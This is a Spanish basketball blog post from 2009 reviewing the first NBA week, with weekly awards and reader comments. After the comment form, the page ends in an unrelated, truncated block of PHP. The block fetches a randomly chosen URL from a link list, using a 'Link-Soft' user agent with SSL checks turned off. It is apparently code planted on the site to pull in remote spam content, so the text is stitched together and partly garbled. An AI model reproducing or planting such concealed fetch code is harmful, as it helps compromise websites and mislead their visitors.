Informe Semanal #1

02 de November de 2009 por TheDeerHunter

Finaliza la primera semana de competición así que toca volver fielmente a nuestros informes. En este caso haremos una excepción y cambiaremos sutilmente nuestra terminología. Hay ciertas cosas que obligatoriamente vamos a echar de menos, pero otras seguirán con nosotros siempre que las evoquemos. Al turrón:

¿Porqué todos los jugones sonríen igual?

Varios equipos tienen razones para sonreír como verdaderos jugones.

Los Celtics se han salido por todos lados. 4 victorias contra 4 buenos equipos, en algún caso de paliza. De largo la mejor defensa de la liga, lo que no es nuevo. La que sí es nueva es la rotación más profunda de su historia reciente.

Con 3 victorias y ninguna derrota les siguen todavía otros 4 equipos. Esperábamos grandes cosas de Orlando, aunque su sonrisa está en cuarentena hasta conocer el alcance de la lesión de Vinsanity. Del resto destacaremos 3 nombres propios que están deslumbrando: Melo, Nash y “El Otro” O’neal.

Por último, por circunstancias especiales, se cuelan en esta categoría los Wizards y los Thunder. No están imbatidos pero tampoco podíamos esperar los buenos resultados que han cosechado esta primera semana.

Ganarás el pan con el sudor de tu frente.

No han terminado mala semana los Lakers sin Gasol pero les queda un regusto amargo con la derrota frente los Mavs en casa y el eterno bajo rendimiento de los suplentes. Tampoco fue plato de gusto la derrota en Chicago de los Spurs. De todas maneras ambos han mostrado su cara buena de candidatos.

Con balance positivo también cierran la semana los Mavs, Hawks, Sixers… y Rockets para los que parece no afectarles los infortunios.

De los Jazz, con dos partidos cerrados con victoria y derrota (contra estos Nuggets tan espectaculares) no podemos decir nada negativo, por ahora. Tampoco de Milwaukee.

Se dejaban llevar.

No esperarían los Cavs llevar dos derrotas a estas alturas, menos con LeBron jugando por momentos impresionantemente bien. Lo de Boston puede pasarle a cualquiera, pero que Bargnani le pegue un baño a tus pívots es mucho más preocupante.

Tres cuartas partes de lo mismo podemos decir de los Blazers. No pasa nada por perder ahora con los mejores Nuggets… ni casi tampoco contra los peleones Rockets (aunque tengan bastante peor plantilla que la tuya) pero es que observamos con preocupación que persisten algunas señales que no transmiten nada bueno. ¿Conseguirán hacer de Andre Miller el base mediocre que ellos prefieren?

Flojos han empezado también los Pistons, Raptors, Bulls y Bobcats. De Memphis o Minnesotta esperábamos más o menos este tipo de resultados.

The Carabasas Club.

He sufrido un déjà vu: Los Clippers como peor equipo de la semana. De poco sirve el nº1 del draft, el increíble estado de forma de Kaman o los buenos partidos de Gordon… Gritad todos conmigo: “¡Dunleavy dimisión!”

No es el único… Los Kings pésimos, Nets, Knicks, Warriors, Pacers… Ciertas cosas nunca cambian.

PREMIOS SEMANALES TJNBA

¿Qué has hecho tú que no hayamos hecho los demás?.

Pues lo que ha hecho el amigo Carmelo Anthony esta semana es estar intratable con, nada menos que casi 38 puntos por partido, 7 rebotes, 4 asistencias… y unos porcentajes de escándalo. El balance impecable de su equipo lo ha notado.

Al salir de clase.

Bueno, hace ya algún tiempo que Brandon Jennings salió de clase. El tercer base de la Lottomatica ha reventado pronósticos con sus 20.5 puntos, 5.5 rebotes, 1.5 robos y 6 asistencias… también con porcentajes supremos. No creemos que Blake Griffin hubiera podido hacerlo mejor esta semana.

La vida puede ser maravillosa.

La vida puede ser maravillosa con O’Neal líder en Miami… pero no es el artículo 34, sino “El Otro” al que un verano sin lesiones le ha sentado fantásticamente bien. 22 puntos 12 rebotes… Eso sí, anoche se rompió la nariz y durante unos días la vida será maravillosa pero en el sofá de su casa.

Cortocircuitos S.L.

Pensábamos que lo de Baron Davis había sido una mala temporada y punto. 11 puntos y 7 asistencias no pueden valer nunca 12 millones de dólares. Dimisión también para ti… Baron

El Oro no está en Moscú.

Con su hermano Pau lesionado, el mejor español esta semana ha sido Marc Gasol. 20 puntos y 11 rebotes estando en el mejor estado de forma de toda su vida. Sus compañeros no son tan egoístas con él como muchos pensaban. Como debe ser siempre que juegue así, por supuesto.

Comenta

10 comentarios a esta entrada

  1. arivas dice:
    #1

    Tremendo Melo en este inicio en modo MVP.

    Ayer vi el partido de Orlando y fue una demostración de recursos en toda regla, sin Carter, sin Lewis sin Pietrus, pues 4 tios con mas de 20 puntos enchufando de lo lindo. Mucho ojo con ellos.
    Por cierto Bosh es otro de los que ha empezado super.

      Citar

  2. M dice:
    #2

    Me ha encantado especialmente la presentación, enhorabuena y muchas gracias!!!

      Citar

  3. Viva_Dirk dice:
    #3

    Pues si Carmelo puede dar este nivel, para mi los Nuggets se suben al carro de forma definitiva, claramente lo que les faltaba es que Melo estuviese por fin al nivel de los candidatos al MVP.

    Orlando con un Nelson como el de antes de la lesión son tan favoritos como el que mas en el Este.

    En cuanto a Brandon Jennings, es muy bueno, evidentemente le falta experiencia y tendrá altibajos durante la temporada, pero el juego uno contra uno de la NBA le viene 100000 veces mejor que el juego de Europa. Hay que buscarle algun mote, estoy en ello.

      Citar

  4. Love Denise dice:
    #4

    Para mí lo de Orlando, no es ninguna sorpresa, tienen la mejor plantilla de la NBA, si encima, dos jugadores con roles secundarios como Anderson y Redick se salen, pues son más favoritos si caben.
    Lo de Jennings, sinceramente no lo entiendo, el año pasado era un paquetazo y ahora se esta saliendo, quizas sea verdad eso de que las defensas en algunos equipos NBA son de risa, y solo aprietan en play offs.

      Citar

  5. pcerezo dice:
    #5

    I love this game!!!!

    Mi punto de vista:

    – Lo de los Cavaliers no pinta bien a largo plazo y en Play-offs. Sigo sin tener claro lo de Shaq.
    – Orlando son dudas los grandes favoritos para llegar a la final con Celtics y allí va a ser una guerra.
    – Lo de los Blazers tampoco lo veo y creo que no tienen tan gran plantilla (seguro que me llueven palos) pero hay alguno que estás sobrevalorado. Lamarcus Aldridge no aguanta el tipo frente a Nowitzki, Gasol, Duncan…Lo de que Steve Blake siga siendo base titula es de fenómeno paranormal.
    – Celtics. Brutales. La plantilla es tremanda y el coach está ajustándolo de maravilla. Chapeau para Doc Rivers.
    – Sigo siendo del club del abulo Vito y de Rick Adelman. Qué haría este tío con la plantilla de los Celtics o con los Lakers. Jugón!!!!
    – Para finalizar y ponerle un monumento al señor (pongámonos de pié) STEVE NASH. Hasta cuando???

    Un saludo,
    Pablo

      Citar

  6. univerzee dice:
    #6

    Y para el Cortocircuitos S.L. que te parecería, 10p 6,7a y 38% de acierto y un 10 en Efficiency por un 14 de Davis, y todo ello por 8,2 kilos?
    Igual pueden darse la mano, no?

      Citar

  7. TheDeerHunter dice:
    #7

    Te refieres a Calderon. Sí, está muy mal el extremeño… ya que mencionas la Efficiency lo sufro en alguno de mis equipos de ligas fantásticas y tal.
    Posiblemente podrían darse de la mano… pero 12 siguen siendo 8 más la mitad de 8… y Baron Davis ha perdido sus 4 partidos, más todo lo malo que le vimos la temporada pasada. Calderón aún se tiene que esforzar mucho para pelearle el premio de decepción a Davis.

      Citar

  8. Jonatan dice:
    #8

    Bueno visto lo visto nadie piensa hablar de frye??
    6-7 en triples¡ y ayer 6-10 ¡¡
    es increible pero ya lleva mas triples que en sus temporadas anteriores completas con 20 pp
    si sige a este ritmo ya sabemos para quien es el premio de la progresion

      Citar

  9. Uno cualquiera dice:
    #9

    Soy consciente de que es muy difícil que suceda, pero: ¿Creéis que si sigue así Marc puede tener opciones reales a ganar el MIP?

      Citar

  10. Jabho dice:
    #10

    El jugón eres tu Deer… que crack.

    Los C´s mooolan y muy bien para lo que me esperaba Orlando. Veremos si duran.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>